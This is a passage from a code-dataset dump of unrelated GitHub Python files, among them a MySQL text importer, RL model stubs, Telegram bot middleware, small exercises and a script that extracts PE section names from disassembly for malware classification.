prompt(questions)\nprint(answers)","repo_name":"wlizama/python-training","sub_path":"terminal_ui/list.py","file_name":"list.py","file_ext":"py","file_size_in_byte":363,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"36605242419","text":"# Import the necessary libraries\nimport os # Provides functions for interacting with the operating system\nimport re # Provides regular expression matching operations\nimport json # Used for JSON manipulation\nimport mysql.connector # Provides methods to connect to a MySQL database\n\nclass TextFileProcessor:\n \"\"\"\n This class is used to process text files. 
It provides methods to read and clean files as well as\n inserting and updating records in a MySQL database.\n \"\"\"\n\n def __init__(self, config_file, max_files=None):\n \"\"\"\n Constructor for the 'TextFileProcessor' class.\n\n :param config_file: A string representing the path to the JSON file containing the database configuration.\n :param max_files: An integer representing the maximum number of files to process.\n \"\"\"\n # Open and load the configuration file\n with open(config_file) as f:\n self.config = json.load(f)\n\n # Connect to the MySQL database\n self.connect_to_db()\n\n # Set the source and destination folders from the configuration file\n self.source_folder = self.config['folders']['source']\n self.dest_folder = self.config['folders']['destination']\n\n # Set the maximum number of files to process\n self.max_files = max_files\n\n def connect_to_db(self):\n \"\"\"\n This method connects to a MySQL database using the configuration settings loaded from the configuration file.\n \"\"\"\n try:\n self.mydb = mysql.connector.connect(\n host=self.config['db']['host'],\n user=self.config['db']['user'],\n password=self.config['db']['password'],\n database=self.config['db']['name']\n )\n\n # Create a cursor for executing SQL commands\n self.cursor = self.mydb.cursor()\n\n except mysql.connector.Error as err:\n print(f\"Error connecting to the database: {err}\")\n raise SystemExit\n\n def process_files(self):\n \"\"\"\n This method processes all files in the source folder.\n \"\"\"\n # Get a list of all files in the source folder\n file_list = os.listdir(self.source_folder)\n\n if file_list:\n total_files = len(file_list)\n\n # Iterate over all files in the source folder\n for count, file in enumerate(file_list, start=1):\n # If the number of processed files is greater than the maximum, stop processing\n if self.max_files and count > self.max_files:\n print(f\"Reached limit of {self.max_files} files\")\n break\n\n print(f\"Starting: {file}\\n\")\n\n # Generate the full path of the file\n file_path = os.path.join(self.source_folder, file)\n\n # Extract metadata from the filename\n source_id, id, page_num = self.extract_metadata_from_filename(file)\n\n # Extract data from the file\n title, text, created_date = self.extract_data_from_file(file_path)\n\n # Clean the extracted text\n text = self.clean_data(text)\n\n # Write the cleaned text to a new file\n self.write_cleaned_file(file, text)\n\n # Prepare the data for insertion or update\n data = {\n 'source_id': source_id,\n 'id': id,\n 'page_num': page_num,\n 'title': title,\n 'text': text,\n 'created_date': created_date\n }\n\n # Insert or update the record in the database\n self.insert_or_update_record(data)\n\n print(f\"Finished processing file {count} of {total_files}\\n\")\n\n else:\n print(\"No files found in the source directory.\")\n\n # Close the database connection after all files have been processed\n self.close_db_connection()\n\n def extract_metadata_from_filename(self, file):\n \"\"\"\n This method extracts metadata from a filename. It expects filenames in the format \"source_id-id-page_num.txt\".\n\n :param file: A string representing the filename to extract metadata from.\n :returns: A tuple containing the source_id, id, and page_num extracted from the filename.\n \"\"\"\n match = re.match(r'(\\d+)-(\\d+)-(\\d+)\\.txt$', file)\n\n if not match:\n print(f\"Filename '{file}' does not match expected format 'source_id-id-page_num.txt'. 
Skipping file.\")\n return None, None, None\n\n return match.groups()\n\n def extract_data_from_file(self, file_path):\n \"\"\"\n This method extracts data from a file. It expects files where the first line is the title\n and the last line is the created date.\n\n :param file_path: A string representing the full path of the file to extract data from.\n :returns: A tuple containing the title, raw text, and created date.\n \"\"\"\n try:\n # Open and read the file\n with open(file_path) as f:\n text = f.read()\n\n except Exception as e:\n print(f\"Could not read file {file_path}. Error: {str(e)}\")\n return None, None, None\n\n # Extract the title and date from the text\n title, created_date = text.split('\\n')[0], text.split('\\n')[-1]\n\n return title, text, created_date\n\n def clean_data(self, raw_text):\n \"\"\"\n This method cleans the extracted raw text data. It removes leading and trailing whitespaces,\n reduces multiple newlines to two, and reduces multiple whitespaces to one.\n\n :param raw_text: A string representing the raw text data to clean.\n :returns: A string representing the cleaned text data.\n \"\"\"\n raw_text = raw_text.strip()\n\n raw_text = re.sub(r'\\n{3,}', '\\n\\n', raw_text)\n raw_text = re.sub(r'\\s{2,}', ' ', raw_text)\n\n return raw_text\n\n def insert_or_update_record(self, record_data):\n \"\"\"\n This method inserts a new record or updates an existing one in the database.\n\n :param record_data: A dictionary containing the record data.\n \"\"\"\n sql = \"\"\"\n INSERT INTO records (source_id, id, title, text, page_num, created_date)\n VALUES (%s, %s, %s, %s, %s, %s)\n ON DUPLICATE KEY UPDATE\n title = VALUES(title),\n text = VALUES(text),\n page_num = VALUES(page_num),\n created_date = VALUES(created_date)\n \"\"\"\n val = (record_data['source_id'], record_data['id'], record_data['title'], record_data['text'],\n record_data['page_num'], record_data['created_date'])\n\n try:\n self.cursor.execute(sql, val)\n self.mydb.commit()\n except mysql.connector.Error as err:\n print(f\"Something went wrong with the SQL execution: {err}\")\n\n def close_db_connection(self):\n \"\"\"\n This method closes the connection to the MySQL database.\n \"\"\"\n try:\n self.cursor.close()\n self.mydb.close()\n print(\"Database connection closed.\")\n except mysql.connector.Error as err:\n print(f\"Something went wrong when closing the database connection: {err}\")\n \n def write_cleaned_file(self, file, text):\n \"\"\"\n This method writes the cleaned text to a new file in the destination folder.\n\n :param file: A string representing the filename.\n :param text: A string representing the cleaned text.\n \"\"\"\n cleaned_file = os.path.join(self.dest_folder, file)\n\n with open(cleaned_file, 'w') as f:\n f.write(text)\n\n\n\n","repo_name":"alantmiller/text-import-project","sub_path":"src/text_file_processor.py","file_name":"text_file_processor.py","file_ext":"py","file_size_in_byte":7765,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"30479111736","text":"from sandbox.rocky.tf.core.network import MLP\n\nimport tensorflow as tf\nimport numpy as np\nfrom rllab.core.serializable import Serializable\nfrom sandbox.rocky.tf.core.layers_powered import LayersPowered\nfrom sandbox.rocky.tf.misc import tensor_utils\nfrom rllab.misc import logger\nfrom collections import OrderedDict\nimport sandbox.rocky.tf.core.layers as L\nfrom sandbox.ours.dynamics import MLPDynamicsModel\nimport time\n\n\nclass 
PointEnvFakeModelEnsemble(Serializable):\n \"\"\"\n Class for MLP continous dynamics model\n \"\"\"\n\n def __init__(self, env_spec, num_models=5, error_range_around_goal=0.5, bias_range=0.05, error_std=0.01, goal=(0,0),\n error_at_goal=False, smooth_error=False, **kwargs):\n self.num_models = num_models\n self.env_spec = env_spec\n self.obs_space_dims = 2\n self.action_space_dims = 2\n self.error_range_around_goal = error_range_around_goal\n self.bias_range = bias_range\n self.error_std = error_std\n self.goal = np.asarray(goal)\n self.error_at_goal = error_at_goal\n self.smooth_error = smooth_error\n\n Serializable.quick_init(self, locals())\n\n self.model_biases = np.random.uniform(-self.bias_range, self.bias_range,\n size=(self.obs_space_dims, self.num_models))\n\n def fit(self, obs, act, obs_next, epochs=1000, compute_normalization=True, valid_split_ratio=None, rolling_average_persitency=None, verbose=False, log_tabular=False):\n \"\"\"\n Fits the NN dynamics model\n :param obs: observations - numpy array of shape (n_samples, ndim_obs)\n :param act: actions - numpy array of shape (n_samples, ndim_act)\n :param obs_next: observations after taking action - numpy array of shape (n_samples, ndim_obs)\n :param epochs: number of training epochs\n :param compute_normalization: boolean indicating whether normalization shall be (re-)computed given the data\n :param valid_split_ratio: relative size of validation split (float between 0.0 and 1.0)\n :param (boolean) whether to log training stats in tabular format\n :param verbose: logging verbosity\n \"\"\"\n assert obs.ndim == 2 and obs.shape[1] == self.obs_space_dims\n assert obs_next.ndim == 2 and obs_next.shape[1] == self.obs_space_dims\n assert act.ndim == 2 and act.shape[1] == self.action_space_dims\n\n self.model_biases = np.random.uniform(-self.bias_range, self.bias_range, size=(self.obs_space_dims, self.num_models))\n\n def predict(self, obs, act, pred_type='rand'):\n \"\"\"\n Predict the batch of next observations given the batch of current observations and actions\n :param obs: observations - numpy array of shape (n_samples, ndim_obs)\n :param act: actions - numpy array of shape (n_samples, ndim_act)\n :param pred_type: prediction type\n - rand: choose one of the models randomly\n - mean: mean prediction of all models\n - all: returns the prediction of all the models\n :return: pred_obs_next: predicted batch of next observations -\n shape: (n_samples, ndim_obs) - in case of 'rand' and 'mean' mode\n (n_samples, ndim_obs, n_models) - in case of 'all' mode\n \"\"\"\n assert obs.shape[0] == act.shape[0]\n assert obs.ndim == 2 and obs.shape[1] == self.obs_space_dims\n assert act.ndim == 2 and act.shape[1] == self.action_space_dims\n\n obs_original = obs\n\n true_delta = np.tile(np.expand_dims(np.clip(act, -0.1, 0.1), 2), (1, 1, self.num_models)) # true point env delta\n\n delta_error = self._delta_error(obs)\n delta = true_delta + delta_error\n\n assert delta.ndim == 3\n\n pred_obs = obs_original[:, :, None] + delta\n\n batch_size = delta.shape[0]\n if pred_type == 'rand':\n # randomly selecting the prediction of one model in each row\n idx = np.random.randint(0, self.num_models, size=batch_size)\n pred_obs = np.stack([pred_obs[row, :, model_id] for row, model_id in enumerate(idx)], axis=0)\n elif pred_type == 'mean':\n pred_obs = np.mean(pred_obs, axis=2)\n elif pred_type == 'all':\n pass\n else:\n NotImplementedError('pred_type must be one of [rand, mean, all]')\n return pred_obs\n\n def predict_model_batches(self, obs_batches, 
act_batches):\n \"\"\"\n Predict the batch of next observations for each model given the batch of current observations and actions for each model\n :param obs_batches: observation batches for each model concatenated along axis 0 - numpy array of shape (batch_size_per_model * num_models, ndim_obs)\n :param act_batches: action batches for each model concatenated along axis 0 - numpy array of shape (batch_size_per_model * num_models, ndim_act)\n :return: pred_obs_next_batch: predicted batch of next observations -\n shape: (batch_size_per_model * num_models, ndim_obs)\n \"\"\"\n assert obs_batches.shape[0] == act_batches.shape[0] and obs_batches.shape[0] % self.num_models == 0\n assert obs_batches.ndim == 2 and obs_batches.shape[1] == self.obs_space_dims\n assert act_batches.ndim == 2 and act_batches.shape[1] == self.action_space_dims\n\n pred_obs_model_stacked = self.predict(obs_batches, act_batches, pred_type='all')\n pred_obs_batches = np.concatenate([pred_obs_split[:, :, i] for i, pred_obs_split in enumerate(np.vsplit(pred_obs_model_stacked, self.num_models))], axis=0)\n\n assert pred_obs_batches.shape == obs_batches.shape\n return pred_obs_batches\n\n def _delta_error(self, obs):\n\n if self.smooth_error:\n distances = np.linalg.norm(obs - self.goal[None, :], axis=1)\n normalized_distances = distances / np.max(distances)\n\n error_mask = (1-normalized_distances)**2 if self.error_at_goal else normalized_distances**2\n else:\n if self.error_at_goal:\n error_mask = (np.linalg.norm(obs-self.goal[None, :], axis=1) < self.error_range_around_goal).astype(np.float32)\n else:\n error_mask = (np.linalg.norm(obs - self.goal[None, :], axis=1) > self.error_range_around_goal).astype(\n np.float32)\n error_mask = np.tile(error_mask.reshape((obs.shape[0], 1, 1)), (1, obs.shape[1],self.num_models))\n\n delta_error = np.random.normal(loc=self.model_biases, scale=self.error_std, size=obs.shape + (self.num_models,))\n\n # mask out delta error in certain regions\n delta_error = np.multiply(error_mask, delta_error)\n\n assert delta_error.shape == obs.shape + (self.num_models,)\n return delta_error\n\n def predict_std(self, obs, act):\n \"\"\"\n calculates the std of predicted next observations among the models\n given the batch of current observations and actions\n :param obs: observations - numpy array of shape (n_samples, ndim_obs)\n :param act: actions - numpy array of shape (n_samples, ndim_act)\n :return: std_pred_obs: std of predicted next observatations - (n_samples, ndim_obs)\n \"\"\"\n assert self.num_models > 1, \"calculating the std requires at \"\n pred_obs = self.predict(obs, act, pred_type='all')\n assert pred_obs.ndim == 3\n return np.std(pred_obs, axis=2)\n\n def reinit_model(self):\n pass\n\n","repo_name":"jonasrothfuss/model_ensemble_meta_learning","sub_path":"experiments/run_scripts/policy_plasticity/point_env_fake_model_ensemble.py","file_name":"point_env_fake_model_ensemble.py","file_ext":"py","file_size_in_byte":7550,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"81"} +{"seq_id":"36238503960","text":"import c4d\nimport os\nimport sys\nimport importlib\n\nSCRIPTPATH = os.path.dirname(__file__)\nLib_Path = os.path.dirname(os.path.dirname(SCRIPTPATH))\n\nif Lib_Path not in sys.path:\n sys.path.append(Lib_Path)\n\n\nimport ualib\nimportlib.reload(ualib)\nimportlib.reload(ualib.utils)\nfrom ualib.core import *\n\n\n\nclass G4D_Test_MainDlg(c4d.gui.GeDialog):\n\n ID_GROUP_NONE = 1000\n ID_Group_Scroll = 1001\n\n def __init__(self):\n self.AUA = 
AdvanceUserArea()\n self.AUA.draw_debug_frames = False\n\n root = self.AUA\n\n # 三层 rect\n parent = root\n item = RectItem(position=Vector(10), size=Vector(300,200))\n item.prop[\"moveable\"] = True\n item.insert_under(parent)\n\n parent = item\n item = RectItem(position=Vector(40), size=Vector(100,100))\n item.prop[\"moveable\"] = True\n item.insert_under(parent)\n\n parent = item\n item = RectItem(position=Vector(50), size=Vector(80,80))\n item.prop[\"moveable\"] = True\n item.insert_under(parent)\n\n # SimpelTextItem\n parent = root\n item = SimpelTextItem(text=\"SimpelTextItem\", position=Vector(340,10))\n item.prop[\"moveable\"] = True\n item.insert_under(parent)\n\n # ClipMapTextItem\n parent = root\n item = ClipMapTextItem(text=\"ClipMapTextItem\", font_size=72, position=Vector(10,220))\n item.prop[\"moveable\"] = True\n item.insert_under(parent)\n\n # BitmapItem\n BMP = ualib.utils.get_bitmap_from(r\"G:\\灵感\\celeste.jpg\")\n parent = root\n item = BitmapItem(bmp=BMP, position=Vector(10,320), size=Vector(300,200))\n item.prop[\"moveable\"] = True\n item.insert_under(parent)\n\n # BaseBezierItem\n parent = root\n item = BaseBezierItem(position=Vector(340,40), size=Vector(20))\n item.add_bezier_object(start=Vector(0), end=Vector(100) ,start_hand_offset=Vector(100,0), end_hand_offset=Vector(-100,0), update=True)\n item.prop[\"moveable\"] = True\n item.insert_under(parent)\n\n # RoundRectItem\n parent = root\n item = RoundRectItem(position=Vector(320,320), size=Vector(100))\n item.prop[\"moveable\"] = True\n item.insert_under(parent)\n\n # RoundRectItem\n parent = root\n item = RoundRectItem(position=Vector(440,320), size=Vector(100), radius=50)\n item.prop[\"moveable\"] = True\n item.insert_under(parent)\n\n # RoundRectItem\n parent = root\n item = RoundRectItem(position=Vector(440,420), size=Vector(100), radius=50)\n item.prop[\"moveable\"] = True\n item.set_seperate_radius(lt=12, rt=22, rb=32, lb=52)\n item.insert_under(parent)\n # RoundRectItem\n parent = root\n item = RoundRectItem(position=Vector(440,520), size=Vector(100, 50), radius=50)\n item.prop[\"moveable\"] = True\n item.set_seperate_radius(lt=20, rt=20, rb=0, lb=0)\n item.insert_under(parent)\n\n def CreateLayout(self):\n self.SetTitle(\"ualibe TEST\")\n if self.GroupBegin(self.ID_GROUP_NONE, c4d.BFH_SCALEFIT| c4d.BFV_SCALEFIT, cols=1, rows=0, title=\"\", groupflags=0, initw=0, inith=0):\n self.GroupBorderSpace(10, 5, 10, 10)\n self.AddCheckbox(200, c4d.BFH_SCALEFIT, 0,0, \"show debug frame\")\n if self.ScrollGroupBegin(self.ID_Group_Scroll, c4d.BFH_SCALEFIT | c4d.BFV_SCALEFIT, scrollflags=c4d.SCROLLGROUP_VERT | c4d.SCROLLGROUP_AUTOVERT):\n self.AddUserArea(100, c4d.BFH_SCALEFIT| c4d.BFV_SCALEFIT, initw=0, inith=0)\n self.AttachUserArea( self.AUA.ua, 100)\n self.GroupEnd()\n self.GroupEnd()\n return True\n\n def InitValues(self):\n return True\n\n def Command(self, id, msg):\n if id == 200:\n self.AUA.draw_debug_frames = self.GetBool(id)\n self.AUA.set_redraw()\n return True\n\n def Message(self, msg, result):\n return c4d.gui.GeDialog.Message(self, msg, result)\n\n\n\nif __name__ == '__main__':\n dialog = G4D_Test_MainDlg()\n dialog.Open(c4d.DLG_TYPE_ASYNC, pluginid=0, xpos=-2, ypos=-2, defaultw=800, defaulth=800, subid=0)","repo_name":"DunHouGo/Boghma-Plugin-HUB","sub_path":"boghma hub/libs/boghma/ualib/test/test_jack_000_basic creat.py","file_name":"test_jack_000_basic creat.py","file_ext":"py","file_size_in_byte":4145,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"81"} 
+{"seq_id":"18843481773","text":"name=\"Mark\"\nsurname=\"Zuckerberg\"\nprint(\"{} {}\".format(name, surname))\n#меняем местами имя и фамилию\nprint(\"{} {}\".format(surname, name))\n\nperson_name = \"Mark Zuckerberg\"\nname, surname = person_name.split(\" \")\nnew_person_name = \"{} {}\".format(surname, name)\nprint(person_name)\nprint(new_person_name)\n\n#задание7\namerican_date = \"05.17.2016\"\nmonth = int(american_date[:2])\nday = int(american_date[3:5])\nyear = int(american_date[6:])\neuropean_date = \"{}.{}.{}\".format(day, month, year)\nprint(american_date)\nprint(european_date)\n\n#задание9\nsnake_case = \"employee_first_name\"\nnew = snake_case.split(\"_\")\ncamelcase = new[0].capitalize()+new[1].capitalize()+new[2].capitalize()\nprint(snake_case)\nprint(camelcase)\n\n#задание10\nwriter = \"Leo Tolstoy*1828-08-28*1910-11-20\"\n#writer = \"Marcus Aurelius*121-04-26*180-03-17\"\nname, date1, date2 = writer.split(\"*\")\ndate_of_birth = date1.split(\"-\")\ndate_of_death = date2.split(\"-\")\nage = int(date_of_death[0])-int(date_of_birth[0])\nprint(\"{}, {}\".format(name,age))\n\n\n\n\n\n\n\n\n","repo_name":"Lera87/homework1","sub_path":"homework 7-10.py","file_name":"homework 7-10.py","file_ext":"py","file_size_in_byte":1051,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"73387007626","text":"from urllib.parse import parse_qs\n\nfrom loguru import logger\n\nfrom app.db import Session\nfrom app.services.dictinary import StatusService\nfrom app.services.form_review import FormService\nfrom app.services.review import ReviewPeriodService\nfrom app.services.user import UserService\nfrom app.tbot.storages import ROUTES, COMMANDS, PERMISSIONS\n\n\ndef add_user(message):\n \"\"\" Добавить пользователя в сообщение \"\"\"\n chat_id = str(message.chat.id)\n user_service = UserService()\n answer = user_service.is_exist(chat_id=chat_id)\n if answer:\n user = user_service.by_chat_id(chat_id=chat_id)\n message.user = \\\n {\n 'is_new': not answer,\n 'is_exist': True,\n 'pk': user.id,\n 'role': user.role.name,\n 'have_boss': True if user.boss else False,\n 'boss': user.boss.username if user.boss else None,\n }\n else:\n message.user = {\n 'is_exist': False\n }\n\n\ndef check_permission(bot, message):\n if message.text:\n if message.user['is_exist']:\n if message.user['role'] == 'Undefined':\n message.command = 'start'\n bot.send_message(message.chat.id, 'Дождитесь окончания регистрации')\n elif message.command not in PERMISSIONS[message.user['role']]:\n message.command = 'wrong'\n elif message.text.replace('/', '') in COMMANDS.keys():\n message.is_exist = True\n message.command = 'start'\n else:\n message.command = 'start'\n\n\ndef add_review_period(message):\n \"\"\" Добавить review преиод \"\"\"\n service = ReviewPeriodService()\n answer = service.is_now\n message.review_period = \\\n {\n 'is_active': answer,\n 'pk': service.current.id if answer else None\n }\n\n\ndef add_form(message):\n \"\"\" Добавить форму \"\"\"\n form_service = FormService()\n if message.review_period['is_active'] and message.user['is_exist']:\n review_period_pk = message.review_period['pk']\n if form_service.is_exist(user_id=message.user['pk'], review_period_id=review_period_pk):\n form = form_service.by(user_id=message.user['pk'], review_period_id=review_period_pk)\n else:\n status_service = StatusService()\n status = status_service.write_in\n form = form_service.create(user_id=message.user['pk'],\n review_period_id=review_period_pk, status=status)\n 
Session().commit()\n\n message.form = \\\n {\n 'is_exist': True,\n 'is_full': False,\n 'pk': form.id,\n 'status': form.status.name,\n }\n else:\n message.form = \\\n {\n 'is_exist': False\n }\n\n\ndef log_command(message):\n \"\"\" Логировать действия пользователей \"\"\"\n user = message.user\n if message.user['is_exist'] and message.text:\n logger.debug(f'\\nUSER {user} COMMAND: {message.command}')\n\n\ndef log_callback(call):\n try:\n args = call.message.args\n except AttributeError:\n args = ''\n user = call.message.user\n logger.debug(f'\\nUSER {user} URL: {call.url} ARGS: {args}')\n\n\ndef log_unknown(message):\n \"\"\" Логировать неизвестного пользователя \"\"\"\n logger.debug(f'ЗАПРОС ОТ CHAT_ID: {message.chat.id}\\nMESSAGE:\\n{message.text}')\n\n\ndef log_bot(message):\n \"\"\" Логировать действия бота \"\"\"\n user = message.user\n logger.debug(\n f'\\nUSER {user} CHAT_ID: {message.chat.id}\\nBOT_CALLBACK_MESSAGE:\\n{message.text}')\n\n\ndef parse_command(bot_instance, message):\n \"\"\" Запарсить команду и поместить её объект сообщения\"\"\"\n if message.text:\n if message.user['is_exist']:\n message.command = message.text.replace('/', '')\n message.is_exist = message.command in COMMANDS.keys()\n elif message.text.replace('/', '') in COMMANDS.keys():\n message.is_exist = True\n message.command = 'start'\n else:\n message.is_exist = False\n else:\n message.is_exist = False\n\n\ndef parse_url(bot_instance, call):\n \"\"\" Запарсить URL callback с аргумантами и поместить их в обзъект сообщения\"\"\"\n # if call.message.user['is_exist']:\n if ':' in call.data: # TODO: решить проблему с сепаратором\n args = {'calendar': call.data}\n if '|' in call.data:\n args['cb'], args['first_date'] = call.data.split(':')[0].split('|')\n else:\n args['cb'] = call.data.split(':')[0]\n args['call'] = call\n call.url = args['cb']\n else:\n args = parse_qs(call.data)\n call.url = args['cb'][0]\n\n call.message.args = args\n call.is_exist = call.url in ROUTES.keys()\n # else:\n # call.url = 'auth'\n\n\n__all__ = \\\n [\n 'add_user',\n 'add_review_period',\n 'add_form',\n 'log_callback',\n 'log_command',\n 'log_unknown',\n 'log_bot',\n 'parse_url',\n 'parse_command',\n 'check_permission'\n ]\n","repo_name":"gagpa/PerformanceReview__mark","sub_path":"app/tbot/middlewares/generals_middlewares.py","file_name":"generals_middlewares.py","file_ext":"py","file_size_in_byte":5382,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"4092371728","text":"import os\nfrom PIL import Image\n\nimport torch\nfrom torchvision import transforms\nfrom torch.utils.data import Dataset\n\n\nclass FIW300(Dataset):\n '''\n 300W Dataset class\n\n '''\n\n def __init__(self, data_dir, indoor=True, outdoor=True, size=(224, 224)):\n assert indoor or outdoor, 'Indoor and outdoor cannot be both set to False.'\n self.size = size\n self.config = {\n 'indoor': (os.path.join(data_dir, '01_Indoor'), indoor),\n 'outdoor': (os.path.join(data_dir, '02_Outdoor'), outdoor)\n }\n\n self.paths = self._get_paths()\n self.transform = transforms.Compose([\n transforms.Grayscale(1),\n transforms.Resize(size),\n transforms.ToTensor(),\n ])\n\n def _get_paths(self):\n '''\n Get paths to files\n\n Parameters\n ----------\n None\n \n Returns\n -------\n data: list\n of the form [(img_path, pts_path), ...]\n\n '''\n\n img_paths, pts_paths = [], []\n for env in ['indoor', 'outdoor']:\n env_dir, env_flag = self.config[env]\n\n if env_flag:\n for f_name in os.listdir(env_dir):\n if 'png' in f_name:\n 
img_paths.append(os.path.join(env_dir, f_name))\n elif 'pts' in f_name:\n pts_paths.append(os.path.join(env_dir, f_name))\n\n img_paths.sort()\n pts_paths.sort()\n paths = list(zip(img_paths, pts_paths))\n return paths\n\n def _get_pts(self, pts_path):\n with open(pts_path) as f:\n lines = [line.strip() for line in f]\n head, tail = lines.index('{')+1, lines.index('}')\n points = lines[head:tail]\n\n pts = [\n tuple([float(point) for point in point.split()]) \n for point in points\n ]\n \n return pts\n\n def _normalize_pts(self, pts, w, h):\n return [(x/w, y/h) for x, y in pts]\n\n def __len__(self):\n return len(self.paths)\n\n def __getitem__(self, i):\n img_path, pts_path = self.paths[i]\n img = Image.open(img_path)\n w, h = img.width, img.height\n img = self.transform(img)\n\n pts = self._get_pts(pts_path)\n pts = self._normalize_pts(pts, w, h)\n pts = torch.Tensor(pts).view(136)\n\n return img, pts","repo_name":"cheulyop/pytorch-facial_landmark_detection","sub_path":"codes/utils/FIW300.py","file_name":"FIW300.py","file_ext":"py","file_size_in_byte":2417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"27441259765","text":"from runners.helpful_fn import CheckPandigital\n\ndef p032():\n print(\"Pandigital products\")\n p = set() \n for i in range(2, 80):\n start = 1234 if i < 10 else 123 \n for j in range(start, 10000//i):\n # check the mulipand the muliplier and the product\n if CheckPandigital(str(i) + str(j) + str(i*j)):\n p.add(i*j)\n print(f\"the pandigital numbers: {p}\")\n return(f\"p032 Ans: {sum(p)}\")","repo_name":"MAshrafM/ProjectEuler","sub_path":"p032/p032.py","file_name":"p032.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"19723439948","text":"from sqlalchemy import create_engine, Column, String\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import sessionmaker\n\nfrom schemas.categories import Category\n\nBase = declarative_base()\n\nclass TableCategory(Base):\n __tablename__ = \"categories\"\n\n id = Column(\"id\", String, primary_key=True)\n title = Column(\"title\", String)\n color_id = Column(\"color_id\", String)\n creator_id = Column(\"creator_id\", String)\n\n def __init__(self, id, title, color_id, creator_id):\n self.id = id\n self.title = title\n self.color_id = color_id\n self.creator_id = creator_id\n\nengine = create_engine(\"sqlite:///db/db/categories.db\")\nBase.metadata.create_all(bind=engine)\n\nsession = sessionmaker(bind=engine)()\n\ndef convert_to_category(category: TableCategory) -> Category:\n return Category(\n id=category.id,\n title=category.title,\n color_id=category.color_id,\n creator_id=category.creator_id\n )\n\ndef convert_to_table_category(category: Category) -> TableCategory:\n return TableCategory(\n id=category.id,\n title=category.title,\n color_id=category.color_id,\n creator_id=category.creator_id\n )\n\ndef get_categories() -> list[Category]:\n query = session.query(TableCategory).all()\n categories = []\n for category in query:\n if category != None: categories.append(convert_to_category(category))\n return categories\n\ndef find_category(id: str) -> Category:\n query = session.query(TableCategory).get(id)\n if query == None: return None\n category = convert_to_category(query)\n return category\n\ndef add_category(category: Category) -> Category:\n session.add(convert_to_table_category(category))\n session.commit()\n return 
category\n\ndef change_category(category: Category) -> Category:\n    query = session.query(TableCategory).get(category.id)\n    if query == None: return None\n    query.title = category.title\n    query.color_id = category.color_id\n\n    session.commit()\n    return category\n\ndef delete_category(category_id: str) -> str:\n    query = session.query(TableCategory).get(category_id)\n    if query == None: return None\n    session.delete(query)\n\n    session.commit()\n    return category_id","repo_name":"maksim4k1/multi-tasker-api","sub_path":"db/categories.py","file_name":"categories.py","file_ext":"py","file_size_in_byte":2129,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"20991261071","text":"\"\"\"\n给定一个二叉树,返回其节点值自底向上的层次遍历。 (即按从叶子节点所在层到根节点所在的层,逐层从左向右遍历)\n\n例如:\n给定二叉树 [3,9,20,null,null,15,7],\n\n    3\n   / \\\n  9  20\n    /  \\\n   15   7\n返回其自底向上的层次遍历为:\n\n[\n  [15,7],\n  [9,20],\n  [3]\n]\n\n来源:力扣(LeetCode)\n链接:https://leetcode-cn.com/problems/binary-tree-level-order-traversal-ii\n著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。\n\"\"\"\n\n\nclass TreeNode:\n    def __init__(self, x):\n        self.val = x\n        self.left = None\n        self.right = None\n\n\nclass Solution:\n    def levelOrderBottom(self, root: TreeNode):\n        # 48ms 14.5MB\n        # 最后翻转一下就好\n        if not root:\n            return []\n\n        result = []\n        tmp_node = [root]\n        while tmp_node:\n            tmp, node_list = [], []\n            for node in tmp_node:\n                tmp.append(node.val)\n                if node.left:\n                    node_list.append(node.left)\n                if node.right:\n                    node_list.append(node.right)\n\n            result.append(tmp)\n            tmp_node = node_list\n\n        return result[::-1]\n","repo_name":"flashlightli/math_question","sub_path":"leetcode_question/easy_question/107_Binary_Tree_Level_Order_Traversal_II.py","file_name":"107_Binary_Tree_Level_Order_Traversal_II.py","file_ext":"py","file_size_in_byte":1268,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"20402032713","text":"from util import *\n\nimport sys\nimport pandas as pd\nimport re\nimport gzip\nimport subprocess\n\n# load configuration file\ndataset_dir, trainLabels = load_config('config.yml') \n\n\n# The list below contains all the reserved sections related to PE format\n# described explicitly in the official Microsoft Docs:\n# https://docs.microsoft.com/en-us/windows/desktop/Debug/pe-format#special-sections\n# Additional sections used by compiler optimizations are added aswell:\n# https://software.intel.com/en-us/forums/intel-c-compiler/topic/538478\npe_sections = ['.bss', '.cormeta', '.data', '.debug$F', '.debug$P',\n               '.debug$P', '.debug$S', '.debug$T', '.drective', '.edata',\n               '.idata', '.idlsym', '.pdata', '.reloc', '.rsrc', '.sbss',\n               '.sdata', '.srdata', '.sxdata', '.text', '.tls', '.tls$',\n               '.vsdata', '.xdata', '.rdata', '.orpc', '.data1', '.text1',\n               '_RDATA', '.debug_o', 'HEADER', 'DATA', 'CODE', 'BSS']\n\n\n# Function that extracts all the sections appearing in the whole group of .asm files\n# in Microsoft's Malware Competition. 
To ensure semantic value of those sections, we\n# assert that those sections discovered are valid sections of the PE format.\n# Returns a list of all different valid sections appearing in .asm files provided\ndef extract_legit_sections(files_list):\n total_files = len(files_list) \n sections_set = set()\n for idx, file_name in enumerate(files_list):\n asm_file = dataset_dir + 'train/' + file_name + '.asm.gz'\n try:\n # encoding of .asm files produced by IDA Pro is ISO-8859-1\n with gzip.open(asm_file, 'rt', encoding='ISO-8859-1') as fp:\n for line in fp.readlines():\n # section name is the first field before ':' in every line\n # and is converted to lower case for data homogeneity\n section_name = line.split(':')[0]\n sections_set.add(section_name)\n except Exception as e:\n log_exception(e, sys.argv[0], asm_file)\n # just to make it fancy\n progress_bar(idx+1, total_files, 50)\n\n # TODO: for further examination\n save_obj(sections_set, 'sections_interim')\n # intersect the valid PE format sections and the sections that appeared in the .asm files\n # in order to consider only valid sections with 